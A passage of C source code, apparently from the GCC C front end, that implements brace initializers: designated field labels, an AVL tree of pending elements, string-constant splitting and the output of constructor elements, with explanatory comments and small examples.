set_init_label (location_t loc, tree fieldname, location_t fieldname_loc,
struct obstack *braced_init_obstack)
{
tree field;
if (set_designator (loc, false, braced_init_obstack))
return;
designator_erroneous = 1;
if (!RECORD_OR_UNION_TYPE_P (constructor_type))
{
error_init (loc, "field name not in record or union initializer");
return;
}
field = lookup_field (constructor_type, fieldname);
if (field == NULL_TREE)
{
tree guessed_id = lookup_field_fuzzy (constructor_type, fieldname);
if (guessed_id)
{
gcc_rich_location rich_loc (fieldname_loc);
rich_loc.add_fixit_misspelled_id (fieldname_loc, guessed_id);
error_at (&rich_loc,
"%qT has no member named %qE; did you mean %qE?",
constructor_type, fieldname, guessed_id);
}
else
error_at (fieldname_loc, "%qT has no member named %qE",
constructor_type, fieldname);
}
else
do
{
constructor_fields = TREE_VALUE (field);
designator_depth++;
designator_erroneous = 0;
if (constructor_range_stack)
push_range_stack (NULL_TREE, braced_init_obstack);
field = TREE_CHAIN (field);
if (field)
{
if (set_designator (loc, false, braced_init_obstack))
return;
}
}
while (field != NULL_TREE);
}
/* Add a new initializer to the tree of pending initializers. PURPOSE
identifies the initializer, either array index or field in a structure.
VALUE is the value of that index or field. If ORIGTYPE is not
NULL_TREE, it is the original type of VALUE.
IMPLICIT is true if value comes from pop_init_level (1),
the new initializer has been merged with the existing one
and thus no warnings should be emitted about overriding an
existing initializer. */
static void
add_pending_init (location_t loc, tree purpose, tree value, tree origtype,
bool implicit, struct obstack *braced_init_obstack)
{
struct init_node *p, **q, *r;
q = &constructor_pending_elts;
p = 0;
if (TREE_CODE (constructor_type) == ARRAY_TYPE)
{
while (*q != 0)
{
p = *q;
if (tree_int_cst_lt (purpose, p->purpose))
q = &p->left;
else if (tree_int_cst_lt (p->purpose, purpose))
q = &p->right;
else
{
if (!implicit)
{
if (TREE_SIDE_EFFECTS (p->value))
warning_init (loc, OPT_Woverride_init_side_effects,
"initialized field with side-effects "
"overwritten");
else if (warn_override_init)
warning_init (loc, OPT_Woverride_init,
"initialized field overwritten");
}
p->value = value;
p->origtype = origtype;
return;
}
}
}
else
{
tree bitpos;
bitpos = bit_position (purpose);
while (*q != NULL)
{
p = *q;
if (tree_int_cst_lt (bitpos, bit_position (p->purpose)))
q = &p->left;
else if (p->purpose != purpose)
q = &p->right;
else
{
if (!implicit)
{
if (TREE_SIDE_EFFECTS (p->value))
warning_init (loc, OPT_Woverride_init_side_effects,
"initialized field with side-effects "
"overwritten");
else if (warn_override_init)
warning_init (loc, OPT_Woverride_init,
"initialized field overwritten");
}
p->value = value;
p->origtype = origtype;
return;
}
}
}
r = (struct init_node *) obstack_alloc (braced_init_obstack,
sizeof (struct init_node));
r->purpose = purpose;
r->value = value;
r->origtype = origtype;
*q = r;
r->parent = p;
r->left = 0;
r->right = 0;
r->balance = 0;
while (p)
{
struct init_node *s;
if (r == p->left)
{
if (p->balance == 0)
p->balance = -1;
else if (p->balance < 0)
{
if (r->balance < 0)
{
/* L rotation. */
p->left = r->right;
if (p->left)
p->left->parent = p;
r->right = p;
p->balance = 0;
r->balance = 0;
s = p->parent;
p->parent = r;
r->parent = s;
if (s)
{
if (s->left == p)
s->left = r;
else
s->right = r;
}
else
constructor_pending_elts = r;
}
else
{
/* LR rotation. */
struct init_node *t = r->right;
r->right = t->left;
if (r->right)
r->right->parent = r;
t->left = r;
p->left = t->right;
if (p->left)
p->left->parent = p;
t->right = p;
p->balance = t->balance < 0;
r->balance = -(t->balance > 0);
t->balance = 0;
s = p->parent;
p->parent = t;
r->parent = t;
t->parent = s;
if (s)
{
if (s->left == p)
s->left = t;
else
s->right = t;
}
else
constructor_pending_elts = t;
}
break;
}
else
{
/* p->balance == +1; growth of left side balances the node. */
p->balance = 0;
break;
}
}
else /* r == p->right */
{
if (p->balance == 0)
/* Growth propagation from right side. */
p->balance++;
else if (p->balance > 0)
{
if (r->balance > 0)
{
/* R rotation. */
p->right = r->left;
if (p->right)
p->right->parent = p;
r->left = p;
p->balance = 0;
r->balance = 0;
s = p->parent;
p->parent = r;
r->parent = s;
if (s)
{
if (s->left == p)
s->left = r;
else
s->right = r;
}
else
constructor_pending_elts = r;
}
else /* r->balance == -1 */
{
/* RL rotation */
struct init_node *t = r->left;
r->left = t->right;
if (r->left)
r->left->parent = r;
t->right = r;
p->right = t->left;
if (p->right)
p->right->parent = p;
t->left = p;
r->balance = (t->balance < 0);
p->balance = -(t->balance > 0);
t->balance = 0;
s = p->parent;
p->parent = t;
r->parent = t;
t->parent = s;
if (s)
{
if (s->left == p)
s->left = t;
else
s->right = t;
}
else
constructor_pending_elts = t;
}
break;
}
else
{
/* p->balance == -1; growth of right side balances the node. */
p->balance = 0;
break;
}
}
r = p;
p = p->parent;
}
}
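/* Keeping pending elements in an AVL tree keeps scattered designated
   initializers such as

     int a[100000] = { [99999] = 1, [0] = 2, [50000] = 3 };

   at O(log n) per insertion, and lets an override of an element that
   was already initialized be detected (and diagnosed under
   -Woverride-init) during the descent.  */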
/* Build AVL tree from a sorted chain. */
static void
set_nonincremental_init (struct obstack * braced_init_obstack)
{
unsigned HOST_WIDE_INT ix;
tree index, value;
if (TREE_CODE (constructor_type) != RECORD_TYPE
&& TREE_CODE (constructor_type) != ARRAY_TYPE)
return;
FOR_EACH_CONSTRUCTOR_ELT (constructor_elements, ix, index, value)
add_pending_init (input_location, index, value, NULL_TREE, true,
braced_init_obstack);
constructor_elements = NULL;
if (TREE_CODE (constructor_type) == RECORD_TYPE)
{
constructor_unfilled_fields = TYPE_FIELDS (constructor_type);
/* Skip any nameless bit fields at the beginning. */
while (constructor_unfilled_fields != NULL_TREE
&& DECL_UNNAMED_BIT_FIELD (constructor_unfilled_fields))
constructor_unfilled_fields = TREE_CHAIN (constructor_unfilled_fields);
}
else if (TREE_CODE (constructor_type) == ARRAY_TYPE)
{
if (TYPE_DOMAIN (constructor_type))
constructor_unfilled_index
= convert (bitsizetype,
TYPE_MIN_VALUE (TYPE_DOMAIN (constructor_type)));
else
constructor_unfilled_index = bitsize_zero_node;
}
constructor_incremental = 0;
}
/* Build AVL tree from a string constant. */
static void
set_nonincremental_init_from_string (tree str,
struct obstack * braced_init_obstack)
{
tree value, purpose, type;
HOST_WIDE_INT val[2];
const char *p, *end;
int byte, wchar_bytes, charwidth, bitpos;
gcc_assert (TREE_CODE (constructor_type) == ARRAY_TYPE);
wchar_bytes = TYPE_PRECISION (TREE_TYPE (TREE_TYPE (str))) / BITS_PER_UNIT;
charwidth = TYPE_PRECISION (char_type_node);
gcc_assert ((size_t) wchar_bytes * charwidth
<= ARRAY_SIZE (val) * HOST_BITS_PER_WIDE_INT);
type = TREE_TYPE (constructor_type);
p = TREE_STRING_POINTER (str);
end = p + TREE_STRING_LENGTH (str);
for (purpose = bitsize_zero_node;
p < end
&& !(constructor_max_index
&& tree_int_cst_lt (constructor_max_index, purpose));
purpose = size_binop (PLUS_EXPR, purpose, bitsize_one_node))
{
if (wchar_bytes == 1)
{
val[0] = (unsigned char) *p++;
val[1] = 0;
}
else
{
val[1] = 0;
val[0] = 0;
for (byte = 0; byte < wchar_bytes; byte++)
{
if (BYTES_BIG_ENDIAN)
bitpos = (wchar_bytes - byte - 1) * charwidth;
else
bitpos = byte * charwidth;
val[bitpos / HOST_BITS_PER_WIDE_INT]
|= ((unsigned HOST_WIDE_INT) ((unsigned char) *p++))
<< (bitpos % HOST_BITS_PER_WIDE_INT);
}
}
if (!TYPE_UNSIGNED (type))
{
bitpos = ((wchar_bytes - 1) * charwidth) + HOST_BITS_PER_CHAR;
if (bitpos < HOST_BITS_PER_WIDE_INT)
{
if (val[0] & (HOST_WIDE_INT_1 << (bitpos - 1)))
{
val[0] |= HOST_WIDE_INT_M1U << bitpos;
val[1] = -1;
}
}
else if (bitpos == HOST_BITS_PER_WIDE_INT)
{
if (val[0] < 0)
val[1] = -1;
}
else if (val[1] & (HOST_WIDE_INT_1
<< (bitpos - 1 - HOST_BITS_PER_WIDE_INT)))
val[1] |= HOST_WIDE_INT_M1U << (bitpos - HOST_BITS_PER_WIDE_INT);
}
value = wide_int_to_tree (type,
wide_int::from_array (val, 2,
HOST_BITS_PER_WIDE_INT * 2));
add_pending_init (input_location, purpose, value, NULL_TREE, true,
braced_init_obstack);
}
constructor_incremental = 0;
}
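/* For example, in

     struct { char s[6]; int i; } v = { .s = "hello", .s[1] = 'E' };

   the string initializer for 'v.s' is split into per-character pending
   elements here, so the designator '.s[1]' can override a single
   character without special-casing STRING_CST everywhere.  */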
/* Return the value of FIELD in the pending initializer, or NULL_TREE
   if the field has not been initialized yet.  */
static tree
find_init_member (tree field, struct obstack * braced_init_obstack)
{
struct init_node *p;
if (TREE_CODE (constructor_type) == ARRAY_TYPE)
{
if (constructor_incremental
&& tree_int_cst_lt (field, constructor_unfilled_index))
set_nonincremental_init (braced_init_obstack);
p = constructor_pending_elts;
while (p)
{
if (tree_int_cst_lt (field, p->purpose))
p = p->left;
else if (tree_int_cst_lt (p->purpose, field))
p = p->right;
else
return p->value;
}
}
else if (TREE_CODE (constructor_type) == RECORD_TYPE)
{
tree bitpos = bit_position (field);
if (constructor_incremental
&& (!constructor_unfilled_fields
|| tree_int_cst_lt (bitpos,
bit_position (constructor_unfilled_fields))))
set_nonincremental_init (braced_init_obstack);
p = constructor_pending_elts;
while (p)
{
if (field == p->purpose)
return p->value;
else if (tree_int_cst_lt (bitpos, bit_position (p->purpose)))
p = p->left;
else
p = p->right;
}
}
else if (TREE_CODE (constructor_type) == UNION_TYPE)
{
if (!vec_safe_is_empty (constructor_elements)
&& (constructor_elements->last ().index == field))
return constructor_elements->last ().value;
}
return NULL_TREE;
}
/* "Output" the next constructor element.
At top level, really output it to assembler code now.
Otherwise, collect it in a list from which we will make a CONSTRUCTOR.
If ORIGTYPE is not NULL_TREE, it is the original type of VALUE.
TYPE is the data type that the containing data type wants here.
FIELD is the field (a FIELD_DECL) or the index that this element fills.
If VALUE is a string constant, STRICT_STRING is true if it is
unparenthesized or we should not warn here for it being parenthesized.
For other types of VALUE, STRICT_STRING is not used.
PENDING if true means output pending elements that belong
right after this element. (PENDING is normally true;
it is false while outputting pending elements, to avoid recursion.)
IMPLICIT is true if value comes from pop_init_level (1),
the new initializer has been merged with the existing one
and thus no warnings should be emitted about overriding an
existing initializer. */
static void
output_init_element (location_t loc, tree value, tree origtype,
bool strict_string, tree type, tree field, bool pending,
bool implicit, struct obstack * braced_init_obstack)
{
tree semantic_type = NULL_TREE;
bool maybe_const = true;
bool npc;
if (type == error_mark_node || value == error_mark_node)
{
constructor_erroneous = 1;
return;
}
if (TREE_CODE (TREE_TYPE (value)) == ARRAY_TYPE
&& (TREE_CODE (value) == STRING_CST
|| TREE_CODE (value) == COMPOUND_LITERAL_EXPR)
&& !(TREE_CODE (value) == STRING_CST
&& TREE_CODE (type) == ARRAY_TYPE
&& INTEGRAL_TYPE_P (TREE_TYPE (type)))
&& !comptypes (TYPE_MAIN_VARIANT (TREE_TYPE (value)),
TYPE_MAIN_VARIANT (type)))
value = array_to_pointer_conversion (input_location, value);
if (TREE_CODE (value) == COMPOUND_LITERAL_EXPR
&& require_constant_value && pending)
{
/* As an extension, allow initializing objects with static storage
duration with compound literals (which are then treated just as
the brace enclosed list they contain). */
if (flag_isoc99)
pedwarn_init (loc, OPT_Wpedantic, "initializer element is not "
"constant");
tree decl = COMPOUND_LITERAL_EXPR_DECL (value);
value = DECL_INITIAL (decl);
}
npc = null_pointer_constant_p (value);
if (TREE_CODE (value) == EXCESS_PRECISION_EXPR)
{
semantic_type = TREE_TYPE (value);
value = TREE_OPERAND (value, 0);
}
value = c_fully_fold (value, require_constant_value, &maybe_const);
if (value == error_mark_node)
constructor_erroneous = 1;
else if (!TREE_CONSTANT (value))
constructor_constant = 0;
else if (!initializer_constant_valid_p (value,
TREE_TYPE (value),
AGGREGATE_TYPE_P (constructor_type)
&& TYPE_REVERSE_STORAGE_ORDER
(constructor_type))
|| (RECORD_OR_UNION_TYPE_P (constructor_type)
&& DECL_C_BIT_FIELD (field)
&& TREE_CODE (value) != INTEGER_CST))
constructor_simple = 0;
if (!maybe_const)
constructor_nonconst = 1;
/* Digest the initializer and issue any errors about incompatible
types before issuing errors about non-constant initializers. */
tree new_value = value;
if (semantic_type)
new_value = build1 (EXCESS_PRECISION_EXPR, semantic_type, value);
new_value = digest_init (loc, type, new_value, origtype, npc, strict_string,
require_constant_value);
if (new_value == error_mark_node)
{
constructor_erroneous = 1;
return;
}
if (require_constant_value || require_constant_elements)
constant_expression_warning (new_value);
/* Proceed to check the constness of the original initializer. */
if (!initializer_constant_valid_p (value, TREE_TYPE (value)))
{
if (require_constant_value)
{
error_init (loc, "initializer element is not constant");
value = error_mark_node;
}
else if (require_constant_elements)
pedwarn (loc, OPT_Wpedantic,
"initializer element is not computable at load time");
}
else if (!maybe_const
&& (require_constant_value || require_constant_elements))
pedwarn_init (loc, OPT_Wpedantic,
"initializer element is not a constant expression");
/* Issue -Wc++-compat warnings about initializing a bitfield with
enum type. */
if (warn_cxx_compat
&& field != NULL_TREE
&& TREE_CODE (field) == FIELD_DECL
&& DECL_BIT_FIELD_TYPE (field) != NULL_TREE
&& (TYPE_MAIN_VARIANT (DECL_BIT_FIELD_TYPE (field))
!= TYPE_MAIN_VARIANT (type))
&& TREE_CODE (DECL_BIT_FIELD_TYPE (field)) == ENUMERAL_TYPE)
{
tree checktype = origtype != NULL_TREE ? origtype : TREE_TYPE (value);
if (checktype != error_mark_node
&& (TYPE_MAIN_VARIANT (checktype)
!= TYPE_MAIN_VARIANT (DECL_BIT_FIELD_TYPE (field))))
warning_init (loc, OPT_Wc___compat,
"enum conversion in initialization is invalid in C++");
}
  /* If this field is empty and does not have side effects (and is not at
     the end of the structure), don't do anything other than checking the
     initializer.  */
if (field
&& (TREE_TYPE (field) == error_mark_node
|| (COMPLETE_TYPE_P (TREE_TYPE (field))
&& integer_zerop (TYPE_SIZE (TREE_TYPE (field)))
&& !TREE_SIDE_EFFECTS (new_value)
&& (TREE_CODE (constructor_type) == ARRAY_TYPE
|| DECL_CHAIN (field)))))
return;
/* Finally, set VALUE to the initializer value digested above. */
value = new_value;
/* If this element doesn't come next in sequence,
put it on constructor_pending_elts. */
if (TREE_CODE (constructor_type) == ARRAY_TYPE
&& (!constructor_incremental
|| !tree_int_cst_equal (field, constructor_unfilled_index)))
{
if (constructor_incremental
&& tree_int_cst_lt (field, constructor_unfilled_index))
set_nonincremental_init (braced_init_obstack);
add_pending_init (loc, field, value, origtype, implicit,
braced_init_obstack);
return;
}
else if (TREE_CODE (constructor_type) == RECORD_TYPE
&& (!constructor_incremental
|| field != constructor_unfilled_fields))
{
/* We do this for records but not for unions. In a union,
no matter which field is specified, it can be initialized
right away since it starts at the beginning of the union. */
if (constructor_incremental)
{
if (!constructor_unfilled_fields)
set_nonincremental_init (braced_init_obstack);
else
{
tree bitpos, unfillpos;
bitpos = bit_position (field);
unfillpos = bit_position (constructor_unfilled_fields);
if (tree_int_cst_lt (bitpos, unfillpos))
set_nonincremental_init (braced_init_obstack);
}
}
add_pending_init (loc, field, value, origtype, implicit,
braced_init_obstack);
return;
}
else if (TREE_CODE (constructor_type) == UNION_TYPE
&& !vec_safe_is_empty (constructor_elements))
{
if (!implicit)
{
if (TREE_SIDE_EFFECTS (constructor_elements->last ().value))
warning_init (loc, OPT_Woverride_init_side_effects,
"initialized field with side-effects overwritten");
else if (warn_override_init)
warning_init (loc, OPT_Woverride_init,
"initialized field overwritten");
}
/* We can have just one union field set. */
constructor_elements = NULL;
}
/* Otherwise, output this element either to
constructor_elements or to the assembler file. */
constructor_elt celt = {field, value};
vec_safe_push (constructor_elements, celt);
/* Advance the variable that indicates sequential elements output. */
if (TREE_CODE (constructor_type) == ARRAY_TYPE)
constructor_unfilled_index
= size_binop_loc (input_location, PLUS_EXPR, constructor_unfilled_index,
bitsize_one_node);
else if (TREE_CODE (constructor_type) == RECORD_TYPE)
{
constructor_unfilled_fields
= DECL_CHAIN (constructor_unfilled_fields);
/* Skip any nameless bit fields. */
while (constructor_unfilled_fields != NULL_TREE
&& DECL_UNNAMED_BIT_FIELD (constructor_unfilled_fields))
constructor_unfilled_fields =
DECL_CHAIN (constructor_unfilled_fields);
}
else if (TREE_CODE (constructor_type) == UNION_TYPE)
constructor_unfilled_fields = NULL_TREE;
/* Now output any pending elements which have become next. */
if (pending)
output_pending_init_elements (0, braced_init_obstack);
}
/* For two FIELD_DECLs in the same chain, return -1 if field1
comes before field2, 1 if field1 comes after field2 and
0 if field1 == field2. */
static int
init_field_decl_cmp (tree field1, tree field2)
{
if (field1 == field2)
return 0;
tree bitpos1 = bit_position (field1);
tree bitpos2 = bit_position (field2);
if (tree_int_cst_equal (bitpos1, bitpos2))
{
/* If one of the fields has non-zero bitsize, then that
field must be the last one in a sequence of zero
sized fields, fields after it will have bigger
bit_position. */
      if (TREE_TYPE (field1) != error_mark_node
	  && COMPLETE_TYPE_P (TREE_TYPE (field1))
	  && integer_nonzerop (TYPE_SIZE (TREE_TYPE (field1))))
	return 1;
      if (TREE_TYPE (field2) != error_mark_node
	  && COMPLETE_TYPE_P (TREE_TYPE (field2))
	  && integer_nonzerop (TYPE_SIZE (TREE_TYPE (field2))))
	return -1;
/* Otherwise, fallback to DECL_CHAIN walk to find out
which field comes earlier. Walk chains of both
fields, so that if field1 and field2 are close to each
other in either order, it is found soon even for large
sequences of zero sized fields. */
tree f1 = field1, f2 = field2;
while (1)
{
f1 = DECL_CHAIN (f1);
f2 = DECL_CHAIN (f2);
if (f1 == NULL_TREE)
{
gcc_assert (f2);
return 1;
}
if (f2 == NULL_TREE)
return -1;
if (f1 == field2)
return -1;
if (f2 == field1)
return 1;
if (!tree_int_cst_equal (bit_position (f1), bitpos1))
return 1;
if (!tree_int_cst_equal (bit_position (f2), bitpos1))
return -1;
}
}
else if (tree_int_cst_lt (bitpos1, bitpos2))
return -1;
else
return 1;
}
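/* For example, in 'struct { int a[0]; int b[0]; int c; } v;' all three
   fields have the same bit_position; 'c' is ordered last because its
   size is non-zero, while 'a' and 'b' are ordered by the DECL_CHAIN
   walk above.  */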
/* Output any pending elements which have become next.
As we output elements, constructor_unfilled_{fields,index}
advances, which may cause other elements to become next;
if so, they too are output.
If ALL is 0, we return when there are
no more pending elements to output now.
If ALL is 1, we output space as necessary so that
we can output all the pending elements. */
static void
output_pending_init_elements (int all, struct obstack * braced_init_obstack)
{
struct init_node *elt = constructor_pending_elts;
tree next;
retry:
/* Look through the whole pending tree.
If we find an element that should be output now,
output it. Otherwise, set NEXT to the element
that comes first among those still pending. */
next = NULL_TREE;
while (elt)
{
if (TREE_CODE (constructor_type) == ARRAY_TYPE)
{
if (tree_int_cst_equal (elt->purpose,
constructor_unfilled_index))
output_init_element (input_location, elt->value, elt->origtype,
true, TREE_TYPE (constructor_type),
constructor_unfilled_index, false, false,
braced_init_obstack);
else if (tree_int_cst_lt (constructor_unfilled_index,
elt->purpose))
{
/* Advance to the next smaller node. */
if (elt->left)
elt = elt->left;
else
{
/* We have reached the smallest node bigger than the
current unfilled index. Fill the space first. */
next = elt->purpose;
break;
}
}
else
{
/* Advance to the next bigger node. */
if (elt->right)
elt = elt->right;
else
{
/* We have reached the biggest node in a subtree. Find
the parent of it, which is the next bigger node. */
while (elt->parent && elt->parent->right == elt)
elt = elt->parent;
elt = elt->parent;
if (elt && tree_int_cst_lt (constructor_unfilled_index,
elt->purpose))
{
next = elt->purpose;
break;
}
}
}
}
else if (RECORD_OR_UNION_TYPE_P (constructor_type))
{
/* If the current record is complete we are done. */
if (constructor_unfilled_fields == NULL_TREE)
break;
int cmp = init_field_decl_cmp (constructor_unfilled_fields,
elt->purpose);
if (cmp == 0)
output_init_element (input_location, elt->value, elt->origtype,
true, TREE_TYPE (elt->purpose),
elt->purpose, false, false,
braced_init_obstack);
else if (cmp < 0)
{
/* Advance to the next smaller node. */
if (elt->left)
elt = elt->left;
else
{
/* We have reached the smallest node bigger than the
current unfilled field. Fill the space first. */
next = elt->purpose;
break;
}
}
else
{
/* Advance to the next bigger node. */
if (elt->right)
elt = elt->right;
else
{
/* We have reached the biggest node in a subtree. Find
the parent of it, which is the next bigger node. */
while (elt->parent && elt->parent->right == elt)
elt = elt->parent;
elt = elt->parent;
if (elt
&& init_field_decl_cmp (constructor_unfilled_fields,
elt->purpose) < 0)
{
next = elt->purpose;
break;
}
}
}
}
}
/* Ordinarily return, but not if we want to output all
and there are elements left. */
if (!(all && next != NULL_TREE))
return;
/* If it's not incremental, just skip over the gap, so that after
jumping to retry we will output the next successive element. */
if (RECORD_OR_UNION_TYPE_P (constructor_type))
constructor_unfilled_fields = next;
else if (TREE_CODE (constructor_type) == ARRAY_TYPE)
constructor_unfilled_index = next;
/* ELT now points to the node in the pending tree with the next
initializer to output. */
goto retry;
}
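/* Illustrative only: pending elements arise from out-of-order designated
initializers, e.g.

  int a[4] = { [2] = 30, [0] = 10, 20 };

[2] = 30 is stored in the pending tree because index 0 is still
unfilled; after 10 and 20 are output for indices 0 and 1, index 2 has
"become next" and the pending element is flushed here. */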
/* Expression VALUE coincides with the start of type TYPE in a braced
initializer. Return true if we should treat VALUE as initializing
the first element of TYPE, false if we should treat it as initializing
TYPE as a whole.
If the initializer is clearly invalid, the question becomes:
which choice gives the best error message? */
static bool
initialize_elementwise_p (tree type, tree value)
{
if (type == error_mark_node || value == error_mark_node)
return false;
gcc_checking_assert (TYPE_MAIN_VARIANT (type) == type);
tree value_type = TREE_TYPE (value);
if (value_type == error_mark_node)
return false;
/* GNU vectors can be initialized elementwise. However, treat any
kind of vector value as initializing the vector type as a whole,
regardless of whether the value is a GNU vector. Such initializers
are valid if and only if they would have been valid in a non-braced
initializer like:
TYPE foo = VALUE;
so recursing into the vector type would be at best confusing or at
worst wrong. For example, when -flax-vector-conversions is in effect,
it's possible to initialize a V8HI from a V4SI, even though the vectors
have different element types and different numbers of elements. */
if (gnu_vector_type_p (type))
return !VECTOR_TYPE_P (value_type);
if (AGGREGATE_TYPE_P (type))
return type != TYPE_MAIN_VARIANT (value_type);
return false;
}
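/* Illustrative only: with -flax-vector-conversions,

  typedef short v8hi __attribute__ ((vector_size (16)));
  typedef int v4si __attribute__ ((vector_size (16)));
  v4si x = { 1, 2, 3, 4 };
  v8hi y = { x };

the initializer X is a vector value, so it initializes Y as a whole
(and must be convertible to v8hi) rather than becoming Y's first
element. */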
/* Add one non-braced element to the current constructor level.
This adjusts the current position within the constructor's type.
This may also start or terminate implicit levels
to handle a partly-braced initializer.
Once this has found the correct level for the new element,
it calls output_init_element.
IMPLICIT is true if value comes from pop_init_level (1),
the new initializer has been merged with the existing one
and thus no warnings should be emitted about overriding an
existing initializer. */
void
process_init_element (location_t loc, struct c_expr value, bool implicit,
struct obstack * braced_init_obstack)
{
tree orig_value = value.value;
int string_flag
= (orig_value != NULL_TREE && TREE_CODE (orig_value) == STRING_CST);
bool strict_string = value.original_code == STRING_CST;
bool was_designated = designator_depth != 0;
designator_depth = 0;
designator_erroneous = 0;
if (!implicit && value.value && !integer_zerop (value.value))
constructor_zeroinit = 0;
/* Handle superfluous braces around string cst as in
char x[] = {"foo"}; */
if (string_flag
&& constructor_type
&& !was_designated
&& TREE_CODE (constructor_type) == ARRAY_TYPE
&& INTEGRAL_TYPE_P (TREE_TYPE (constructor_type))
&& integer_zerop (constructor_unfilled_index))
{
if (constructor_stack->replacement_value.value)
error_init (loc, "excess elements in %<char%> array initializer");
constructor_stack->replacement_value = value;
return;
}
if (constructor_stack->replacement_value.value != NULL_TREE)
{
error_init (loc, "excess elements in struct initializer");
return;
}
/* Ignore elements of a brace group if it is entirely superfluous
and has already been diagnosed, or if the type is erroneous. */
if (constructor_type == NULL_TREE || constructor_type == error_mark_node)
return;
/* Ignore elements of an initializer for a variable-size type.
Those are diagnosed in digest_init. */
if (COMPLETE_TYPE_P (constructor_type)
&& !poly_int_tree_p (TYPE_SIZE (constructor_type)))
return;
if (!implicit && warn_designated_init && !was_designated
&& TREE_CODE (constructor_type) == RECORD_TYPE
&& lookup_attribute ("designated_init",
TYPE_ATTRIBUTES (constructor_type)))
warning_init (loc,
OPT_Wdesignated_init,
"positional initialization of field "
"in %<struct%> declared with %<designated_init%> attribute");
/* If we've exhausted any levels that didn't have braces,
pop them now. */
while (constructor_stack->implicit)
{
if (RECORD_OR_UNION_TYPE_P (constructor_type)
&& constructor_fields == NULL_TREE)
process_init_element (loc,
pop_init_level (loc, 1, braced_init_obstack,
last_init_list_comma),
true, braced_init_obstack);
else if ((TREE_CODE (constructor_type) == ARRAY_TYPE
|| gnu_vector_type_p (constructor_type))
&& constructor_max_index
&& tree_int_cst_lt (constructor_max_index,
constructor_index))
process_init_element (loc,
pop_init_level (loc, 1, braced_init_obstack,
last_init_list_comma),
true, braced_init_obstack);
else
break;
}
/* In the case of [LO ... HI] = VALUE, only evaluate VALUE once. */
if (constructor_range_stack)
{
/* If value is a compound literal and we'll be just using its
content, don't put it into a SAVE_EXPR. */
if (TREE_CODE (value.value) != COMPOUND_LITERAL_EXPR
|| !require_constant_value)
{
tree semantic_type = NULL_TREE;
if (TREE_CODE (value.value) == EXCESS_PRECISION_EXPR)
{
semantic_type = TREE_TYPE (value.value);
value.value = TREE_OPERAND (value.value, 0);
}
value.value = save_expr (value.value);
if (semantic_type)
value.value = build1 (EXCESS_PRECISION_EXPR, semantic_type,
value.value);
}
}
while (1)
{
if (TREE_CODE (constructor_type) == RECORD_TYPE)
{
tree fieldtype;
enum tree_code fieldcode;
if (constructor_fields == NULL_TREE)
{
pedwarn_init (loc, 0, "excess elements in struct initializer");
break;
}
fieldtype = TREE_TYPE (constructor_fields);
if (fieldtype != error_mark_node)
fieldtype = TYPE_MAIN_VARIANT (fieldtype);
fieldcode = TREE_CODE (fieldtype);
/* Error for non-static initialization of a flexible array member. */
if (fieldcode == ARRAY_TYPE
&& !require_constant_value
&& TYPE_SIZE (fieldtype) == NULL_TREE
&& DECL_CHAIN (constructor_fields) == NULL_TREE)
{
error_init (loc, "non-static initialization of a flexible "
"array member");
break;
}
/* Error for initialization of a flexible array member with
a string constant if the structure is in an array. E.g.:
struct S { int x; char y[]; };
struct S s[] = { { 1, "foo" } };
is invalid. */
if (string_flag
&& fieldcode == ARRAY_TYPE
&& constructor_depth > 1
&& TYPE_SIZE (fieldtype) == NULL_TREE
&& DECL_CHAIN (constructor_fields) == NULL_TREE)
{
bool in_array_p = false;
for (struct constructor_stack *p = constructor_stack;
p && p->type; p = p->next)
if (TREE_CODE (p->type) == ARRAY_TYPE)
{
in_array_p = true;
break;
}
if (in_array_p)
{
error_init (loc, "initialization of flexible array "
"member in a nested context");
break;
}
}
/* Accept a string constant to initialize a subarray. */
if (value.value != NULL_TREE
&& fieldcode == ARRAY_TYPE
&& INTEGRAL_TYPE_P (TREE_TYPE (fieldtype))
&& string_flag)
value.value = orig_value;
/* Otherwise, if we have come to a subaggregate,
and we don't have an element of its type, push into it. */
else if (value.value != NULL_TREE
&& initialize_elementwise_p (fieldtype, value.value))
{
push_init_level (loc, 1, braced_init_obstack);
continue;
}
if (value.value)
{
push_member_name (constructor_fields);
output_init_element (loc, value.value, value.original_type,
strict_string, fieldtype,
constructor_fields, true, implicit,
braced_init_obstack);
RESTORE_SPELLING_DEPTH (constructor_depth);
}
else
/* Do the bookkeeping for an element that was
directly output as a constructor. */
{
/* For a record, keep track of end position of last field. */
if (DECL_SIZE (constructor_fields))
constructor_bit_index
= size_binop_loc (input_location, PLUS_EXPR,
bit_position (constructor_fields),
DECL_SIZE (constructor_fields));
/* If the current field was the first one not yet written out,
it isn't now, so update. */
if (constructor_unfilled_fields == constructor_fields)
{
constructor_unfilled_fields = DECL_CHAIN (constructor_fields);
/* Skip any nameless bit fields. */
while (constructor_unfilled_fields != NULL_TREE
&& DECL_UNNAMED_BIT_FIELD (constructor_unfilled_fields))
constructor_unfilled_fields =
DECL_CHAIN (constructor_unfilled_fields);
}
}
constructor_fields = DECL_CHAIN (constructor_fields);
/* Skip any nameless bit fields at the beginning. */
while (constructor_fields != NULL_TREE
&& DECL_UNNAMED_BIT_FIELD (constructor_fields))
constructor_fields = DECL_CHAIN (constructor_fields);
}
else if (TREE_CODE (constructor_type) == UNION_TYPE)
{
tree fieldtype;
enum tree_code fieldcode;
if (constructor_fields == NULL_TREE)
{
pedwarn_init (loc, 0,
"excess elements in union initializer");
break;
}
fieldtype = TREE_TYPE (constructor_fields);
if (fieldtype != error_mark_node)
fieldtype = TYPE_MAIN_VARIANT (fieldtype);
fieldcode = TREE_CODE (fieldtype);
/* Warn that traditional C rejects initialization of unions.
We skip the warning if the value is zero. This is done
under the assumption that the zero initializer in user
code appears conditioned on e.g. __STDC__ to avoid
"missing initializer" warnings and relies on default
initialization to zero in the traditional C case.
We also skip the warning if the initializer is designated,
again on the assumption that this must be conditional on
__STDC__ anyway (and we've already complained about the
member-designator). */
if (!in_system_header_at (input_location) && !constructor_designated
&& !(value.value && (integer_zerop (value.value)
|| real_zerop (value.value))))
warning (OPT_Wtraditional, "traditional C rejects initialization "
"of unions");
/* Accept a string constant to initialize a subarray. */
if (value.value != NULL_TREE
&& fieldcode == ARRAY_TYPE
&& INTEGRAL_TYPE_P (TREE_TYPE (fieldtype))
&& string_flag)
value.value = orig_value;
/* Otherwise, if we have come to a subaggregate,
and we don't have an element of its type, push into it. */
else if (value.value != NULL_TREE
&& initialize_elementwise_p (fieldtype, value.value))
{
push_init_level (loc, 1, braced_init_obstack);
continue;
}
if (value.value)
{
push_member_name (constructor_fields);
output_init_element (loc, value.value, value.original_type,
strict_string, fieldtype,
constructor_fields, true, implicit,
braced_init_obstack);
RESTORE_SPELLING_DEPTH (constructor_depth);
}
else
/* Do the bookkeeping for an element that was
